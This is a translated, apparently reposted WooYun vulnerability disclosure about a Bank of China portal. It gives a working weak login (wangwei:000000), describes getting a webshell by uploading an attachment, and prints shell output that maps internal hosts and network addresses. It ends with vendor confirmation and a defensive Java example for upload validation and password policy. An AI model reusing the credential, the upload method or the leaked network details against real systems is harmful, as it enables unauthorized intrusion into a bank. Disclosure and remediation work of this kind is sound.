A Bank of China system has a weak password that allows uploading a SHELL (penetrating the perimeter firewall into the intranet)


Vulnerability details

Disclosure status:

2016-05-01: Details reported to the vendor, awaiting vendor action
2016-05-04: Vendor confirmed; details disclosed to the vendor only
2016-05-14: Details disclosed to core white hats and relevant domain experts
2016-05-24: Details disclosed to regular white hats
2016-06-03: Details disclosed to intern white hats
2016-06-18: Details disclosed to the public

Brief description:

A Bank of China system has a weak password that allows uploading a SHELL (penetrating the perimeter firewall into the intranet)

Detailed description:

#1 Discovery method

Using a generic weak-password detection script: simple, efficient, and enormously destructive.

http://zone.wooyun.org/content/22529

http://zone.wooyun.org/content/21962

Top 500 Chinese names (statistics from the national population database)

http://zone.wooyun.org/content/18372

#2 Vulnerability description

https://e.boc.cn/ehome/property/frame/sign.do

Found 1 weak password: wangwei:000000

In the community management function, adding an attachment is enough to obtain a shell.

[Image: fujian.png]



Proof of vulnerability:

https://e.boc.cn/ehome/eshop/ehome-files/eproperty/2016/05/01/Customize14*********.jsp

[Image: webshell.jpg]

Code area:
[/]$ /sbin/ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:50:56:9A:72:2C
inet addr:21.123.47.151 Bcast:21.123.47.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:127879201 errors:0 dropped:0 overruns:0 frame:0
TX packets:117334178 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:22666975632 (21.1 GiB) TX bytes:32615347620 (30.3 GiB)

eth1 Link encap:Ethernet HWaddr 00:50:56:9A:14:C4
inet addr:10.123.47.151 Bcast:10.123.47.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:51273711 errors:0 dropped:0 overruns:0 frame:0
TX packets:46856648 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:12233542012 (11.3 GiB) TX bytes:9912431273 (9.2 GiB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:238664440 errors:0 dropped:0 overruns:0 frame:0
TX packets:238664440 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:24040429146 (22.3 GiB) TX bytes:24040429146 (22.3 GiB)
[/]$ cat /etc/hosts
127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
21.123.47.146 P1EZECAP01
21.123.47.147 P1EZECAP02
21.123.47.148 P1EZECAP03
21.123.47.149 P1EZECAP04
21.123.47.150 P1EZECAP05
21.123.47.151 P1EZECAP06
21.123.47.152 P1EZECAP07
21.123.47.153 P1EZECAP08
10.123.47.146 P1EZECAP01_gpfs
10.123.47.147 P1EZECAP02_gpfs
10.123.47.148 P1EZECAP03_gpfs
10.123.47.149 P1EZECAP04_gpfs
10.123.47.150 P1EZECAP05_gpfs
10.123.47.151 P1EZECAP06_gpfs
10.123.47.152 P1EZECAP07_gpfs
10.123.47.153 P1EZECAP08_gpfs
21.122.32.116 ZabbixServer
21.123.102.88 nbu3media1
21.123.102.89 nbu3media2
21.123.102.90 nbu3master
[/]$ /sbin/arp -a
? (21.123.47.161) at 00:50:56:9a:3d:95 [ether] on eth0
P1EZECAP05 (21.123.47.150) at 00:50:56:9a:00:55 [ether] on eth0
? (21.123.47.1) at 00:00:0c:9f:f0:2f [ether] on eth0
P1EZECAP01_gpfs (10.123.47.146) at 00:50:56:9a:62:66 [ether] on eth1
P1EZECAP05_gpfs (10.123.47.150) at 00:50:56:9a:79:c7 [ether] on eth1
P1EZECAP03_gpfs (10.123.47.148) at 00:50:56:9a:31:0c [ether] on eth1
P1EZECAP04_gpfs (10.123.47.149) at 00:50:56:9a:6f:8f [ether] on eth1
P1EZECAP07 (21.123.47.152) at 00:50:56:9a:49:62 [ether] on eth0
P1EZECAP08_gpfs (10.123.47.153) at 00:50:56:9a:7b:08 [ether] on eth1
P1EZECAP07_gpfs (10.123.47.152) at 00:50:56:9a:05:f1 [ether] on eth1
P1EZECAP02_gpfs (10.123.47.147) at 00:50:56:9a:56:89 [ether] on eth1
[/]$

Remediation:

Fix the weak password and fix the upload vulnerability.
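As an added example (not code from the report or from the vendor), the two server-side checks the remediation line calls for, written in Java because the affected application is JSP-based. The storage directory, the allowed extension set and the password policy thresholds are assumptions; the attachment path and the weak credential are taken from the report above.

```java
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Locale;
import java.util.Set;
import java.util.UUID;

/** Hardening for the two defects in the report: arbitrary attachment upload and a trivial password. */
public final class UploadHardening {
    // Only the attachment types the community-management feature needs; no script extensions (assumed list).
    private static final Set<String> ALLOWED_EXT = Set.of("png", "jpg", "jpeg", "gif", "pdf");
    // Attachments are written here, outside the servlet container's document root, so nothing
    // uploaded can ever be reached as .../ehome-files/...Customize*.jsp and executed (assumed path).
    private static final Path STORE_DIR = Paths.get("/var/app/ehome-attachments");

    /** Returns where an upload may be stored, or throws if the file is not an allowed attachment. */
    public static Path storagePathFor(String clientFileName) {
        if (clientFileName == null || clientFileName.isEmpty()) {
            throw new IllegalArgumentException("missing file name");
        }
        // Drop any client-supplied directory components ("../x", "C:\\x") and reject NUL bytes.
        String base = clientFileName.replace('\\', '/');
        base = base.substring(base.lastIndexOf('/') + 1);
        int dot = base.lastIndexOf('.');
        if (dot <= 0 || base.indexOf('\0') >= 0) {
            throw new IllegalArgumentException("rejected file name: " + clientFileName);
        }
        // Check the LAST extension after lower-casing: "shell.png.jsp" -> "jsp" -> rejected.
        String ext = base.substring(dot + 1).toLowerCase(Locale.ROOT);
        if (!ALLOWED_EXT.contains(ext)) {
            throw new IllegalArgumentException("extension not allowed: " + ext);
        }
        // Never reuse the client's name: a server-generated name removes any remaining ambiguity.
        return STORE_DIR.resolve(UUID.randomUUID() + "." + ext);
    }

    /** Minimal policy that rejects "wangwei:000000": too short, too few distinct characters, or contains the user name. */
    public static boolean isWeakPassword(String username, String password) {
        if (password == null || password.length() < 10) return true;
        if (password.chars().distinct().count() < 4) return true;   // "000000", "aaaaaaaaaa"
        if (username != null && !username.isEmpty()
                && password.toLowerCase(Locale.ROOT).contains(username.toLowerCase(Locale.ROOT))) return true;
        return false;
    }

    public static void main(String[] args) {
        System.out.println(isWeakPassword("wangwei", "000000"));   // true
        System.out.println(storagePathFor("../fujian.PNG"));        // /var/app/ehome-attachments/<uuid>.png
        try { storagePathFor("Customize.png.jsp"); }
        catch (IllegalArgumentException e) { System.out.println(e.getMessage()); }  // extension not allowed: jsp
    }
}
```

A content sniff of the first bytes against the declared type is a useful third layer, but the decisive control is that uploads are never written under a path the JSP engine serves.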

Copyright notice: when reposting, please credit the source: 猪猪侠@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed at: 2016-05-04 20:50

Vendor reply:

Thanks to the white hat.

Latest status:

None yet



Permalink: A Bank of China system has a weak password that allows uploading a SHELL (penetrating the perimeter firewall into the intranet) - https://www.15qq.cn/wooyun/725.html
